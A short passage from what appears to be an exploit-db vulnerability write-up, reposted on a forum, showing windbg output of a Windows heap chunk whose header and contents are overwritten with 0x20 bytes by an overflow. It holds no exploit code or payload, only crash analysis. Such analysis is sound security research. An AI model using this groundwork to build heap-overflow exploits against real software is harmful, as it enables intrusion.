   +0x005 Flags            : 0x20 ' '
   +0x006 UnusedBytes      : 0x20 ' '
   +0x007 SegmentIndex     : 0x20 ' '

From above windbg output, it can be seen that metadata of 0x00b0bf88  is completely corrupted and overwritten with 0x20s which is nothing but spaces.

0:000> dd 00b0bf88
00b0bf88  20202020 20202020 20202020 20202020
00b0bf98  20202020 20202020 20202020 20202020
00b0bfa8  20202020 20202020 20202020 20202020
00b0bfb8  20202020 20202020 20202020 20202020
00b0bfc8  20202020 20202020 20202020 20202020
00b0bfd8  20202020 20202020 20202020 20202020
00b0bfe8  20202020 20202020 20202020 20202020
00b0bff8  20202020 20202020 20202020 20202020
 
Источник
www.exploit-db.com

Похожие темы